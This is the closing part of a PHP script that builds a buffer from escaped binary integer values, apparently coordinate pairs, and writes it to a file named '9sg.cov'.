"\x00\x00\x00\x67\x01\x00\x00\xf3\x00\x00\x00\x67\x01\x00\x00\xfc".
"\x00\x00\x00\x67\x01\x00\x00\xff\x00\x00\x00\x67\x01\x00\x00\x0a".
"\x01\x00\x00\x67\x01\x00\x00\x0d\x01\x00\x00\x67\x01\x00\x00\x0f".
"\x01\x00\x00\x65\x01\x00\x00\x13\x01\x00\x00\x65\x01\x00\x00\x15".
"\x01\x00\x00\x64\x01\x00\x00\x16\x01\x00\x00\x63\x01\x00\x00\x18".
"\x01\x00\x00\x63\x01\x00\x00\x19\x01\x00\x00\x61\x01\x00\x00\x1b".
"\x01\x00\x00\x5e\x01\x00\x00\x1d\x01\x00\x00\x5d\x01\x00\x00\x1e".
"\x01\x00\x00\x5c\x01\x00\x00\x20\x01\x00\x00\x5b\x01\x00\x00\x22".
"\x01\x00\x00\x58\x01\x00\x00\x24\x01\x00\x00\x57\x01\x00\x00\x25".
"\x01\x00\x00\x56\x01\x00\x00\x25\x01\x00\x00\x56\x01\x00\x00\x26".
"\x01\x00\x00\x37\x00\x00\x00\x71\x01\x00\x00\x6e\xff\xff\xff\xad".
"\x00\x00\x00\x3c\xff\xff\xff\xdd\x00\x00\x00\x00";
file_put_contents("9sg.cov",$buff);
?>